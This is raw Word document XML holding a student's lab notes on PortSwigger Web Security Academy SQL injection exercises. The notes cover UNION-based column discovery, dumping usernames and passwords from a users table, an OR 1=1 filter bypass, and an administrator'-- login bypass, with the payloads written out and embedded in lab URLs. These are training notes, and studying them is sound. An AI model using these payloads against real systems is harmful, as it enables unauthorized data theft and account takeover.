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B224" w14:textId="38630345" w:rsidR="00C44FA4" w:rsidRPr="00CE27A8" w:rsidRDefault="00C44FA4" w:rsidP="00C44FA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE27A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     WEEK-4 (Port</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE2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7A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Swigger Web Security Academy Server-side topics — SQL Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD5E3AE" w14:textId="069797A9" w:rsidR="00CE27A8" w:rsidRDefault="00CE27A8" w:rsidP="00CE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2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7A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL injection UNION attack, finding a column containing text</w:t>
      </w:r>
      <w:r w:rsidR="009870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6A3D41" w14:textId="77777777" w:rsidR="00BA0C22" w:rsidRDefault="00BA0C22" w:rsidP="00BA0C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16B7F" w14:textId="66166BFF" w:rsidR="004A6712" w:rsidRPr="004A6712" w:rsidRDefault="00BA0C22" w:rsidP="004A671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539F267" wp14:editId="52BBB6B0">
            <wp:extent cx="5731510" cy="3137535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1485390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0715" name="Picture 1485390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5A79" w14:textId="0803569E" w:rsidR="00DD681A" w:rsidRDefault="00BA0C22" w:rsidP="00DD68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hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00F87FF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https://0ae0000f049ac585863908ab009c00b4.web-security-academy.net/filter?category=Pets</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E30C97E" w14:textId="77777777" w:rsidR="00347764" w:rsidRDefault="00347764" w:rsidP="00DD68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A7A82" w14:textId="49F1FF92" w:rsidR="00B251AC" w:rsidRPr="00512AFA" w:rsidRDefault="00B251AC" w:rsidP="00512A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2AFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The lab wants us to retrieve the string “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00512AFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dJcjCD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00512AFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” therefore we will append th</w:t>
      </w:r>
      <w:r w:rsidR="00AB22C0" w:rsidRPr="00512AFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">e                  </w:t>
      </w:r>
      <w:r w:rsidRPr="00512AFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>following one at a time to the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5AA1D3" w14:textId="13538103" w:rsidR="00B251AC" w:rsidRDefault="00AB22C0" w:rsidP="00B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251AC" w:rsidRPr="00B251AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION SELECT '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B251AC" w:rsidRPr="00B251AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dJcjCD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B251AC" w:rsidRPr="00B251AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>',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NULL,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NULL--</w:t>
      </w:r>
      <w:r w:rsidR="00B251AC" w:rsidRPr="00B251A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251AC" w:rsidRPr="00B251AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION SELECT NULL,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B251AC" w:rsidRPr="00B251AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dJcjCD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B251AC" w:rsidRPr="00B251AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>',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NULL--</w:t>
      </w:r>
      <w:r w:rsidR="00B251AC" w:rsidRPr="00B251A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251AC" w:rsidRPr="00B251AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION SELECT NULL,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NULL,</w:t>
      </w:r>
      <w:r w:rsidR="00E142FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B251AC" w:rsidRPr="00B251A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B251AC" w:rsidRPr="00B251AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dJcjCD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B251AC" w:rsidRPr="00B251A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4F7584B3" w14:textId="4FEF1035" w:rsidR="00987022" w:rsidRDefault="00987022" w:rsidP="0098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5F54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL injection UNION attack, determining the number of columns returned by the query :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554BD32C" w14:textId="77777777" w:rsidR="00266DBB" w:rsidRDefault="00266DBB" w:rsidP="00266D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86D44B3" w14:textId="3D38B3E3" w:rsidR="005A2A0E" w:rsidRDefault="00093545" w:rsidP="005A2A0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 UNION </w:t>
      </w:r>
      <w:r w:rsidR="00266DBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SELECT NULL,NULL,NULL— to the end of the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BC55AA" w14:textId="36B100D6" w:rsidR="00266DBB" w:rsidRDefault="00E431D8" w:rsidP="00E431D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Pr="00F87FF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https://0</w:t>
        </w:r>
        <w:r w:rsidRPr="00F87FF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a5f00d103e0402c80250d5a00430032.web-security-academy.net/filter?category=Giftsa%27%20UNION%20SELECT%20NULL,NULL,NULL--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DA9041C" w14:textId="5FCAF26A" w:rsidR="00582559" w:rsidRPr="00582559" w:rsidRDefault="00E431D8" w:rsidP="00F74CB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1FC4E89" wp14:editId="490E970F">
            <wp:extent cx="5731510" cy="2620645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="652217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7727" name="Picture 6522177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88F" w14:textId="502AFEE5" w:rsidR="007A0AF4" w:rsidRDefault="007A0AF4" w:rsidP="007A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F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  SQL injection UNION attack, retrieving data from other tables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CC8D25B" w14:textId="632ADA75" w:rsidR="007A0AF4" w:rsidRDefault="007A0AF4" w:rsidP="007A0A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8C5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E0BB861" wp14:editId="09F2E513">
            <wp:extent cx="5731510" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1008924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24115" name="Picture 10089241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9A28" w14:textId="642D6818" w:rsidR="009E28C5" w:rsidRDefault="00CF3235" w:rsidP="007A0A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hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00F87FF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https://0aef000803dd437080713ac600b90077.web-security-academy.net/my-account?id=administrator</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="515CA528" w14:textId="525AC993" w:rsidR="00CF3235" w:rsidRDefault="00CF3235" w:rsidP="007A0A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701D" w14:textId="1A2592FD" w:rsidR="00512AFA" w:rsidRDefault="00236A94" w:rsidP="00512AFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00512AFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">For the given </w:t>
      </w:r>
      <w:r w:rsidR="00E81874">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00512AFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> add </w:t>
      </w:r>
      <w:r w:rsidR="00512AFA" w:rsidRPr="00512AFA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>' UNION SELECT username, password FROM users</w:t>
      </w:r>
      <w:r w:rsidR="00512AFA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578D3227" w14:textId="4D7002A8" w:rsidR="00512AFA" w:rsidRDefault="00F44CC1" w:rsidP="00512AFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Then click on “MY Account”</w:t>
      </w:r>
      <w:r w:rsidR="00B417A3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E81874">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00B417A3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">give the username and password which will be available </w:t>
      </w:r>
      <w:r w:rsidR="00E47145">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">after adding </w:t>
      </w:r>
      <w:r w:rsidR="00E47145" w:rsidRPr="00512AFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">add </w:t>
      </w:r>
      <w:r w:rsidR="00E47145" w:rsidRPr="00512AFA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>' UNION SELECT username, password FROM users</w:t>
      </w:r>
      <w:r w:rsidR="00E47145">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="00E47145">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E81874">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">in the before page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA8E526" w14:textId="390DE58C" w:rsidR="005C3806" w:rsidRPr="001223D5" w:rsidRDefault="005C3806" w:rsidP="001223D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223D5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001223D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223D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001223D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Security Academy client-side topics — SQL Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5944C76D" w14:textId="2F33B5BB" w:rsidR="00CC1201" w:rsidRPr="004E20B2" w:rsidRDefault="00C86B4D" w:rsidP="00AF7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0B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL injection vulnerability in WHERE clause allowing retrieval of hidden data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAC6C01" w14:textId="48FC9F70" w:rsidR="00236A94" w:rsidRPr="00236A94" w:rsidRDefault="00BA3A3F" w:rsidP="007A0A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3A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7D71D1" wp14:editId="53F77B6D">
            <wp:extent cx="5731510" cy="4848225"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="31397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798" w14:textId="77777777" w:rsidR="00582559" w:rsidRPr="007A0AF4" w:rsidRDefault="00582559" w:rsidP="00DD68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20C78" w14:textId="08C1D578" w:rsidR="00A4209A" w:rsidRDefault="00642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URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00717D21" w:rsidRPr="00F87FF1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://0a67002c049b80ef803e49dc007b0039.web-security-academy.net/filter?category=Food+%26+Drink%27+OR+1=1%20--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C63E37B" w14:textId="0ED49676" w:rsidR="00642D4E" w:rsidRDefault="00F47F6B" w:rsidP="00717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8B5089">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>‘+OR+</w:t>
      </w:r>
      <w:r w:rsidR="0054289B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1=1 – to the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4F0595" w14:textId="77777777" w:rsidR="00C86B4D" w:rsidRDefault="00C86B4D" w:rsidP="00C86B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EA8EE" w14:textId="22408775" w:rsidR="00C86B4D" w:rsidRPr="004E20B2" w:rsidRDefault="004E20B2" w:rsidP="00C86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0B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL injection vulnerability allowing login bypass </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777FF6D9" w14:textId="77777777" w:rsidR="0054289B" w:rsidRDefault="0054289B" w:rsidP="00542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E87BF" w14:textId="77777777" w:rsidR="006029D5" w:rsidRPr="006029D5" w:rsidRDefault="006029D5" w:rsidP="006029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29D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>After typing the username administrator, we added a quote ‘ and double hyphens - - as below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330A7611" w14:textId="77777777" w:rsidR="006029D5" w:rsidRPr="006029D5" w:rsidRDefault="006029D5" w:rsidP="006029D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006029D5">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>administrator’—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFF0315" w14:textId="77665D3F" w:rsidR="006029D5" w:rsidRPr="00B06D65" w:rsidRDefault="006029D5" w:rsidP="00B06D65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B06D65">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = ‘administrator’--‘ AND password =‘’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF93C5C" w14:textId="6EE0CEA2" w:rsidR="005B4BFB" w:rsidRPr="00717D21" w:rsidRDefault="00A6272D" w:rsidP="005428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27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6417F6" wp14:editId="0413C43E">
            <wp:extent cx="5731510" cy="3360420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18196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7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FB" w:rsidRPr="0071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6E2B" w14:textId="77777777" w:rsidR="00BA3724" w:rsidRDefault="00BA3724" w:rsidP="005B4BFB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2B90BE21" w14:textId="77777777" w:rsidR="00BA3724" w:rsidRDefault="00BA3724" w:rsidP="005B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8162" w14:textId="77777777" w:rsidR="00BA3724" w:rsidRDefault="00BA3724" w:rsidP="005B4BFB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="220A06A6" w14:textId="77777777" w:rsidR="00BA3724" w:rsidRDefault="00BA3724" w:rsidP="005B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575"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8347B8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DC1E16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4560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0588"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B62EAC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74F9C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5EEA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9576C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3508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61440"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="168C3B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64391"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2B29532"/>
    <w:lvl w:ilvl="0" w:tplc="6718A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E6530"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FA0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CD4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="901E5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54CFF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A16B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05865">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1073702385">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="932323461">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="421414368">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1499349771">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="395130099">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1069115811">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="5089554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45018372">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="42485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4B"/>
    <w:rsid w:val="00093545"/>
    <w:rsid w:val="001223D5"/>
    <w:rsid w:val="00236A94"/>
    <w:rsid w:val="00266DBB"/>
    <w:rsid w:val="00286709"/>
    <w:rsid w:val="00347764"/>
    <w:rsid w:val="003C184B"/>
    <w:rsid w:val="004A6712"/>
    <w:rsid w:val="004E20B2"/>
    <w:rsid w:val="00512AFA"/>
    <w:rsid w:val="0054289B"/>
    <w:rsid w:val="00582559"/>
    <w:rsid w:val="005A2A0E"/>
    <w:rsid w:val="005B4BFB"/>
    <w:rsid w:val="005C3806"/>
    <w:rsid w:val="006029D5"/>
    <w:rsid w:val="00642D4E"/>
    <w:rsid w:val="006D5A35"/>
    <w:rsid w:val="006E4BF7"/>
    <w:rsid w:val="00717D21"/>
    <w:rsid w:val="007A0AF4"/>
    <w:rsid w:val="008B5089"/>
    <w:rsid w:val="00987022"/>
    <w:rsid w:val="009E1C35"/>
    <w:rsid w:val="009E28C5"/>
    <w:rsid w:val="00A4209A"/>
    <w:rsid w:val="00A6272D"/>
    <w:rsid w:val="00AA075A"/>
    <w:rsid w:val="00AB22C0"/>
    <w:rsid w:val="00AF71A0"/>
    <w:rsid w:val="00B06D65"/>
    <w:rsid w:val="00B251AC"/>
    <w:rsid w:val="00B417A3"/>
    <w:rsid w:val="00B86630"/>
    <w:rsid w:val="00BA0C22"/>
    <w:rsid w:val="00BA3724"/>
    <w:rsid w:val="00BA3A3F"/>
    <w:rsid w:val="00C44FA4"/>
    <w:rsid w:val="00C86B4D"/>
    <w:rsid w:val="00CC1201"/>
    <w:rsid w:val="00CE27A8"/>
    <w:rsid w:val="00CF3235"/>
    <w:rsid w:val="00D05F54"/>
    <w:rsid w:val="00DD681A"/>
    <w:rsid w:val="00E142FD"/>
    <w:rsid w:val="00E25C88"/>
    <w:rsid w:val="00E431D8"/>
    <w:rsid w:val="00E47145"/>
    <w:rsid w:val="00E81874"/>
    <w:rsid w:val="00F44CC1"/>
    <w:rsid w:val="00F47F6B"/>
    <w:rsid w:val="00F74CBF"/>
    <w:rsid w:val="00F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4C84"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0969CED3-A6E0-4AC7-AD61-346999C4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A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25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47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F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F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ae0000f049ac585863908ab009c00b4.web-security-academy.net/filter?category=Pe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0aef000803dd437080713ac600b90077.web-security-academy.net/my-account?id=administr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0a5f00d103e0402c80250d5a00430032.web-security-academy.net/filter?category=Giftsa%27%20UNION%20SELECT%20NULL,NULL,NULL--" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0a67002c049b80ef803e49dc007b0039.web-security-academy.net/filter?category=Food+%26+Drink%27+OR+1=1%20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206</Words>
  <Characters>1463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anjaliraolingampalli@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>anjaliraolingampalli@gmail.com</cp:lastModifiedBy>
  <cp:revision>50</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-16T05:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-16T06:49:00Z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eb6aa983-7923-4a50-8813-a33b38e488ab</vt:lpwstr>
  </property>
</Properties>
</file>